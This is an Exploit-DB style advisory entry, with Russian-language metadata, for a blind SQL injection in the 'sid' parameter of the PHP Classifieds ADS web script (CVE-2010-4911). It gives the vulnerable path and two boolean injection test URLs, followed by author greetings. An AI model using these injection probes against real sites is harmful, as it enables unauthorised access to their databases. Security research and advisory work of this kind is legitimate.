Exploit PHP Classifieds ADS - 'sid' Blind SQL Injection

[Exploiter]

EDB-ID

14891

Проверка EDB

1. Пройдено

Автор

H4CK3R

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2010-4911

Дата публикации

2010-09-04

[~] Title:    PHP CLASSIFIEDS ADS
[~] Price:   $49
[~] Link :   http://www.sellatsite.com/sellatsite/phpclass.asp
[~] Author:    BorN To K!LL - h4ck3r
[~] 3xploit:

/detail.php?sid=[Blind-Injection]

[~] 3xample:

http://www.example.com/classi/detail.php?sid=80 and 1=1--             // True ,,

http://www.example.com/classi/detail.php?sid=80 and 1=2--            // False ,,

[~] Greetings:

string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends");